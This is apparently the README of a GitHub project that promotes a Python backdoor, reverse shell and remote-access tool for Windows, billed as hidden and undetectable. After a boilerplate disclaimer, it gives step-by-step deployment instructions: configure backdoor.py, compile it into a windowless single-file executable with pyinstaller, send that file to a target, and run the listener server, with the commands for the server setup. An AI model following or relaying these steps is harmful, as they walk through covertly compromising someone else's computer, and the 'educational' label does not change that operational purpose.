/descry

This program is an non-object oriented opensource, hidden and undetectable backdoor/reverse shell/RAT for Windows made in Python 3 which contains many features such as multi-client support and cross-platform server.

Primary LanguagePythonGNU General Public License v3.0GPL-3.0

DESCRY v1.0(beta)

DISCLAIMER

TO BE USED FOR EDUCATIONAL PURPOSES ONLY

**COMPLETE RESPONSIBILITY of the END-USER**. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Also we inform you that some of your your actions may be **ILLEGAL** and you **CAN NOT** use this software to test person or company without **WRITTEN PERMISSION** from them.

DEVELOPERS & CONTRIBUTORS

  1. HADES (https://github.com/hades-onion)

BACKDOOR

Backdoor is a term that refers to the access of the software or hardware of a computer system without being detected. The backdoor can be created by the developer themselves so that they can quickly and easily make changes to the code without the need to log in to the system.

SCREENSHOT (Listner)

Shot

TESTED :-

(server)

  • Linux
  • Windows
  • Android
  • IOS
  • OSX

TESTED :-

(Backdoor)

  • Linux
  • Windows
  • Android
  • OSX

PREREQUISITES ( Please verify if you have installed )

  • Python 3.*
  • termcolor (pip install termcolor)

Guide

1. BACKDOOR

  • Open backdoor.py with editor(text/script) Shot
  • Change these two options and save file now ether you can run this python script straight away on target

#OR

  • You can convert this python file to exe using pyinstaller
  • Install python3 on your windows. Shot
  • pyinstalller backdoor.py --noconsole --onefile Shot
  • you will get the exe file in dist folder send this file to target and start the server. Shot

2. SERVER

  • apt-get install python3
  • apt-get install python3-pip
  • pip install termcolor
  • apt-get install git
  • git clone https://github.com/hades-onion/descry
  • cd descry
  • sudo chmod +x server.py
  • sudo python3 server.py Shot

SHELL

  • Use help to see options Shot